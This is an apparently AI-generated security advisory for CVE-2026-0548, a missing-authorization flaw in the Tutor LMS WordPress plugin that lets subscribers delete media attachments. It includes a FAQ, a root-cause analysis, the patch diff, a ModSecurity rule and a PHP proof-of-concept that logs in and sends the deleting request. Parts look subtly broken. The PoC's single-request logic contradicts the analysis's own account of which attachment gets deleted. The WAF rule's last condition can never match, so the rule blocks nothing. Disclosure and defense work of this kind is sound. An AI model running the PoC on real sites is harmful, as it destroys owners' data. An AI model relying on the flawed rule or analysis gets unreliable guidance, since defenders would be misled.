What is CVE-2026-0548?

CVE-2026-0548 is a medium-severity vulnerability in the Tutor LMS plugin for WordPress, affecting versions up to and including 3.9.4. It allows authenticated users with subscriber-level access or higher to delete arbitrary attachments due to a missing authorization check in the attachment deletion process.

How does the vulnerability work?

The vulnerability arises from the `delete_existing_user_photo` function, which does not verify if the user has ownership of the attachment before deletion. Authenticated users can exploit this by sending a specially crafted request to update their profile photo, which triggers the deletion of any attachment they specify.

Who is affected by this vulnerability?

Any WordPress site using the Tutor LMS plugin version 3.9.4 or earlier is affected. This includes sites where users have subscriber-level access or higher, as they can exploit the vulnerability to delete attachments.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Tutor LMS plugin installed. If it is version 3.9.4 or earlier, your site is at risk. Additionally, review user roles to identify any authenticated users with subscriber access or higher.

How can I fix or mitigate this vulnerability?

To fix this vulnerability, update the Tutor LMS plugin to version 3.9.5 or later, where the issue has been patched. Regularly check for updates to all plugins and themes to ensure vulnerabilities are addressed promptly.

What does the CVSS score of 5.4 indicate?

The CVSS score of 5.4 indicates a medium severity level, suggesting that while authentication is required to exploit the vulnerability, it can lead to significant issues such as data loss or disruption of site functionality.

What are the practical risks associated with this vulnerability?

The practical risks include the potential for authenticated users to delete important media files, which could disrupt the content and functionality of the site. This could lead to data loss and affect the overall user experience.

What is a proof of concept (PoC) in this context?

A proof of concept is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how an authenticated user can send a request to delete an attachment by manipulating their profile photo update, effectively demonstrating the flaw.

What steps should I take if I have already been exploited?

If you suspect that your site has been exploited due to this vulnerability, immediately restore any deleted attachments from backups, review user roles and permissions, and change passwords for affected accounts. Consider conducting a security audit to assess any further risks.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all plugins and themes, implement strict user role management, and conduct periodic security audits. Additionally, consider using security plugins that monitor for unauthorized changes and vulnerabilities.

Where can I find more information about this vulnerability?

More information about CVE-2026-0548 can be found in the official CVE database, security advisories from the Tutor LMS team, and reputable security research sites that track WordPress vulnerabilities.

Is there a way to report vulnerabilities I discover?

Yes, if you discover vulnerabilities, you should report them to the affected plugin or theme developers through their official channels. Many organizations have a responsible disclosure policy to handle such reports.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0548: Tutor LMS – eLearning and online course solution <= 3.9.4 – Missing Authorization to Authenticated (Subscriber+) Limited Attachment Deletion (tutor)

CVE ID CVE-2026-0548

Plugin tutor

Severity Medium (CVSS 5.4)

CWE 862

Vulnerable Version 3.9.4

Patched Version 3.9.5

Disclosed January 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0548:
The vulnerability is a missing authorization flaw in the Tutor LMS WordPress plugin, allowing authenticated users with subscriber-level access or higher to delete arbitrary site attachments. The issue resides in the user profile photo update functionality, specifically within the `update_user_profile` method in the `User` class.

Root Cause: The vulnerability exists in the `update_user_profile` method within `/tutor/classes/User.php`. The method processes user-submitted profile data, including a `_tutor_profile_photo` field containing an attachment ID. Prior to the patch, the method directly passed this ID to `update_user_meta` on line 373 without verifying the requesting user’s ownership of the referenced attachment. The subsequent call to `delete_existing_user_photo` on line 245 would then delete the attachment referenced by the old user meta value without any capability check, relying solely on the user ID stored in the meta key.

Exploitation: An authenticated attacker (Subscriber+) can send a POST request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php` with the `action` parameter set to `tutor_update_profile`. The request must include the `_tutor_profile_photo` parameter containing the numeric ID of any attachment on the site. Submitting this request triggers the `update_user_profile` method, which updates the attacker’s profile photo meta to the target attachment ID and deletes the attachment previously linked to their profile (if any). The `delete_existing_user_photo` function executes `wp_delete_attachment` on the old ID, permanently deleting the file from the server.

Patch Analysis: The patch adds an authorization check within the `update_user_profile` method in `/tutor/classes/User.php`. Before updating the user meta on lines 375-383, the code now validates the submitted `$_tutor_profile_image` value. If the value is numeric, it fetches the corresponding post object. If the post type is ‘attachment’ and the post author does not match the current user ID (`$user_id`), the function returns early without updating the meta or triggering the deletion routine. This prevents users from associating attachments they do not own with their profile, thereby blocking the unauthorized deletion chain.

Impact: Successful exploitation allows an authenticated attacker with minimal privileges to permanently delete any media library attachment, potentially disrupting site content, functionality, or design. This constitutes an integrity attack leading to data loss. The CVSS score of 5.4 reflects the requirement for authentication and the attack’s limited scope to attachment deletion, not full site compromise.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/tutor/classes/Quiz.php
+++ b/tutor/classes/Quiz.php
@@ -283,9 +283,9 @@
 		$attempt_details = self::attempt_details( Input::post( 'attempt_id', 0, Input::TYPE_INT ) );
 		$feedback        = Input::post( 'feedback', '', Input::TYPE_KSES_POST );
 		$attempt_info    = isset( $attempt_details->attempt_info ) ? $attempt_details->attempt_info : false;
-		$course_id       = tutor_utils()->avalue_dot( 'course_id', $attempt_info, 0 );
-
-		if ( ! tutor_utils()->is_instructor_of_this_course( get_current_user_id(), $course_id ) ) {
+		$course_id       = tutor_utils()->avalue_dot( 'course_id', $attempt_details, 0 );
+		$is_instructor   = tutor_utils()->is_instructor_of_this_course( get_current_user_id(), $course_id );
+		if ( ! current_user_can( 'manage_options' ) && ! $is_instructor ) {
 			wp_send_json_error( tutor_utils()->error_message() );
 		}

--- a/tutor/classes/User.php
+++ b/tutor/classes/User.php
@@ -245,7 +245,9 @@
 	private function delete_existing_user_photo( $user_id, $type ) {
 		$meta_key = 'cover_photo' == $type ? '_tutor_cover_photo' : '_tutor_profile_photo';
 		$photo_id = get_user_meta( $user_id, $meta_key, true );
-		is_numeric( $photo_id ) ? wp_delete_attachment( $photo_id, true ) : 0;
+		if ( is_numeric( $photo_id ) ) {
+			wp_delete_attachment( $photo_id, true );
+		}
 		delete_user_meta( $user_id, $meta_key );
 	}

@@ -281,7 +283,7 @@
 		/**
 		 * Photo Update from profile
 		 */
-		$photo      = tutor_utils()->array_get( 'photo_file', $_FILES );
+		$photo      = tutor_utils()->array_get( 'photo_file', $_FILES ); //phpcs:ignore -- already sanitized.
 		$photo_size = tutor_utils()->array_get( 'size', $photo );
 		$photo_type = tutor_utils()->array_get( 'type', $photo );

@@ -373,6 +375,14 @@
 		$_tutor_profile_bio       = Input::post( self::PROFILE_BIO_META, '', Input::TYPE_KSES_POST );
 		$_tutor_profile_image     = Input::post( self::PROFILE_PHOTO_META, '', Input::TYPE_KSES_POST );

+		if ( is_numeric( $_tutor_profile_image ) ) {
+			$attachment = get_post( $_tutor_profile_image );
+
+			if ( 'attachment' === $attachment->post_type && $user_id !== $attachment->post_author ) {
+				return;
+			}
+		}
+
 		update_user_meta( $user_id, self::PROFILE_JOB_TITLE_META, $_tutor_profile_job_title );
 		update_user_meta( $user_id, self::PROFILE_BIO_META, $_tutor_profile_bio );
 		update_user_meta( $user_id, self::PROFILE_PHOTO_META, $_tutor_profile_image );
--- a/tutor/classes/Utils.php
+++ b/tutor/classes/Utils.php
@@ -4066,11 +4066,13 @@
 				WHERE	comments.comment_post_ID = %d
 						AND comments.comment_type = %s
 						AND commentmeta.meta_key = %s
+						AND comments.comment_approved = %s
 				GROUP BY CAST(commentmeta.meta_value AS SIGNED);
 				",
 					$course_id,
 					'tutor_course_rating',
-					'tutor_rating'
+					'tutor_rating',
+					'approved'
 				)
 			);

--- a/tutor/models/CartModel.php
+++ b/tutor/models/CartModel.php
@@ -73,13 +73,19 @@
 			);
 		}

+		if ( 'gift' === $item_type ) {
+			$item_details = wp_json_encode( $item_details, JSON_UNESCAPED_UNICODE );
+		} else {
+			$item_details = wp_json_encode( $item_details );
+		}
+
 		return QueryHelper::insert(
 			"{$wpdb->prefix}tutor_cart_items",
 			array(
 				'cart_id'      => $user_cart_id,
 				'course_id'    => $course_id,
 				'item_type'    => $item_type,
-				'item_details' => $item_details ? wp_json_encode( $item_details ) : null,
+				'item_details' => $item_details,
 			)
 		);
 	}
@@ -261,5 +267,4 @@
 			)
 		);
 	}
-
 }
--- a/tutor/templates/single/course/reviews.php
+++ b/tutor/templates/single/course/reviews.php
@@ -25,7 +25,7 @@
 $current_user_id = get_current_user_id();
 $course_id       = Input::post( 'course_id', get_the_ID(), Input::TYPE_INT );
 $reviews         = tutor_utils()->get_course_reviews( $course_id, $offset, $per_page, false, array( 'approved' ), $current_user_id );
-$reviews_total   = tutor_utils()->get_course_reviews( $course_id, null, null, true, array( 'approved' ), $current_user_id );
+$reviews_total   = tutor_utils()->get_course_reviews( $course_id, null, null, true, array( 'approved' ) );
 $my_rating       = tutor_utils()->get_reviews_by_user( 0, 0, 150, false, $course_id, array( 'approved', 'hold' ) );

 if ( Input::has( 'course_id' ) ) {
--- a/tutor/tutor.php
+++ b/tutor/tutor.php
@@ -4,7 +4,7 @@
  * Plugin URI: https://tutorlms.com
  * Description: Tutor is a complete solution for creating a Learning Management System in WordPress way. It can help you to create small to large scale online education site very conveniently. Power features like report, certificate, course preview, private file sharing make Tutor a robust plugin for any educational institutes.
  * Author: Themeum
- * Version: 3.9.4
+ * Version: 3.9.5
  * Author URI: https://themeum.com
  * Requires PHP: 7.4
  * Requires at least: 5.3
@@ -26,7 +26,7 @@
  *
  * @since 1.0.0
  */
-define( 'TUTOR_VERSION', '3.9.4' );
+define( 'TUTOR_VERSION', '3.9.5' );
 define( 'TUTOR_FILE', __FILE__ );

 /**
--- a/tutor/vendor/composer/installed.php
+++ b/tutor/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'themeum/tutor',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => '043bcc9b76cd1e56219d167b8be313b5aa933109',
+        'reference' => 'ad35941bc49eab600939a865a136e4a05cf217f8',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         'themeum/tutor' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => '043bcc9b76cd1e56219d167b8be313b5aa933109',
+            'reference' => 'ad35941bc49eab600939a865a136e4a05cf217f8',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
--- a/tutor/views/pages/view_attempt.php
+++ b/tutor/views/pages/view_attempt.php
@@ -16,12 +16,13 @@
 use TUTORInput;
 use TutorModelsQuizModel;

-$attempt_id   = Input::get( 'view_quiz_attempt_id', 0, Input::TYPE_INT );
-$attempt      = tutor_utils()->get_attempt( $attempt_id );
-$attempt_data = $attempt;
-$user_id      = tutor_utils()->avalue_dot( 'user_id', $attempt_data );
-$quiz_id      = $attempt && isset( $attempt->quiz_id ) ? $attempt->quiz_id : 0;
-$course_id    = tutor_utils()->avalue_dot( 'course_id', $attempt_data );
+$attempt_id    = Input::get( 'view_quiz_attempt_id', 0, Input::TYPE_INT );
+$attempt       = tutor_utils()->get_attempt( $attempt_id );
+$attempt_data  = $attempt;
+$user_id       = tutor_utils()->avalue_dot( 'user_id', $attempt_data );
+$quiz_id       = $attempt && isset( $attempt->quiz_id ) ? $attempt->quiz_id : 0;
+$course_id     = tutor_utils()->avalue_dot( 'course_id', $attempt_data );
+$is_instructor = tutor_utils()->is_instructor_of_this_course( get_current_user_id(), $course_id );
 if ( ! $attempt ) {
 	tutor_utils()->tutor_empty_state( __( 'Attempt not found', 'tutor' ) );
 	return;
@@ -31,8 +32,8 @@
 	return;
 }

-if ( ! tutor_utils()->is_instructor_of_this_course( get_current_user_id(), $course_id ) ) {
-	tutor_utils()->tutor_empty_state();
+if ( ! current_user_can( 'manage_options' ) && ! $is_instructor ) {
+	tutor_utils()->tutor_empty_state( __( 'Access denied!', 'tutor' ) );
 	return;
 }

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-0548
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:1000548,phase:2,deny,status:403,chain,msg:'CVE-2026-0548: Block unauthorized attachment deletion via Tutor LMS profile update',severity:'CRITICAL',tag:'CVE-2026-0548',tag:'WordPress',tag:'Plugin/TutorLMS'"
  SecRule ARGS_POST:action "@streq tutor_update_profile" "chain"
    SecRule &ARGS_POST:_tutor_profile_photo "@gt 0" "chain"
      SecRule ARGS_POST:_tutor_profile_photo "@rx ^[0-9]+$" "chain"
        SecRule REQUEST_COOKIES:/^wordpress_logged_in_/ "!@rx ^.*$" 
          "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',setvar:'tx.cve_2026_0548_block=1'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0548 - Tutor LMS – eLearning and online course solution <= 3.9.4 - Missing Authorization to Authenticated (Subscriber+) Limited Attachment Deletion
<?php

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';
$username   = 'attacker_subscriber';
$password   = 'attacker_password';
$attachment_id_to_delete = 123; // ID of the target attachment

// Initialize cURL session for login
$ch = curl_init();

// Step 1: Authenticate and obtain WordPress cookies
$login_url = str_replace('/admin-ajax.php', '/wp-login.php', $target_url);
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Adjust for HTTPS

$response = curl_exec($ch);

// Step 2: Send malicious AJAX request to trigger profile update and attachment deletion
// This assumes the attacker's current profile photo meta value is empty or points to a disposable attachment.
$ajax_fields = [
    'action' => 'tutor_update_profile',
    '_tutor_profile_photo' => $attachment_id_to_delete, // Set profile photo to target attachment
    // Other required profile fields (example values)
    '_tutor_profile_job_title' => 'Hacker',
    '_tutor_profile_bio' => 'Atomic Edge Research'
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($ajax_fields));

$response = curl_exec($ch);
curl_close($ch);

// Check response
if (strpos($response, 'success') !== false) {
    echo "[+] Request sent. The attachment with ID $attachment_id_to_delete should be deleted.n";
} else {
    echo "[-] Attack may have failed. Response: $responsen";
}

?>

Frequently Asked Questions

What is CVE-2026-0548?
Overview of the vulnerability
CVE-2026-0548 is a medium-severity vulnerability in the Tutor LMS plugin for WordPress, affecting versions up to and including 3.9.4. It allows authenticated users with subscriber-level access or higher to delete arbitrary attachments due to a missing authorization check in the attachment deletion process.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the `delete_existing_user_photo` function, which does not verify if the user has ownership of the attachment before deletion. Authenticated users can exploit this by sending a specially crafted request to update their profile photo, which triggers the deletion of any attachment they specify.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Tutor LMS plugin version 3.9.4 or earlier is affected. This includes sites where users have subscriber-level access or higher, as they can exploit the vulnerability to delete attachments.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Tutor LMS plugin installed. If it is version 3.9.4 or earlier, your site is at risk. Additionally, review user roles to identify any authenticated users with subscriber access or higher.
How can I fix or mitigate this vulnerability?
Recommended actions
To fix this vulnerability, update the Tutor LMS plugin to version 3.9.5 or later, where the issue has been patched. Regularly check for updates to all plugins and themes to ensure vulnerabilities are addressed promptly.
What does the CVSS score of 5.4 indicate?
Understanding risk levels
The CVSS score of 5.4 indicates a medium severity level, suggesting that while authentication is required to exploit the vulnerability, it can lead to significant issues such as data loss or disruption of site functionality.
What are the practical risks associated with this vulnerability?
Potential impact on websites
The practical risks include the potential for authenticated users to delete important media files, which could disrupt the content and functionality of the site. This could lead to data loss and affect the overall user experience.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
A proof of concept is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how an authenticated user can send a request to delete an attachment by manipulating their profile photo update, effectively demonstrating the flaw.
What steps should I take if I have already been exploited?
Response to exploitation
If you suspect that your site has been exploited due to this vulnerability, immediately restore any deleted attachments from backups, review user roles and permissions, and change passwords for affected accounts. Consider conducting a security audit to assess any further risks.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, regularly update all plugins and themes, implement strict user role management, and conduct periodic security audits. Additionally, consider using security plugins that monitor for unauthorized changes and vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-0548 can be found in the official CVE database, security advisories from the Tutor LMS team, and reputable security research sites that track WordPress vulnerabilities.
Is there a way to report vulnerabilities I discover?
Responsible disclosure
Yes, if you discover vulnerabilities, you should report them to the affected plugin or theme developers through their official channels. Many organizations have a responsible disclosure policy to handle such reports.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations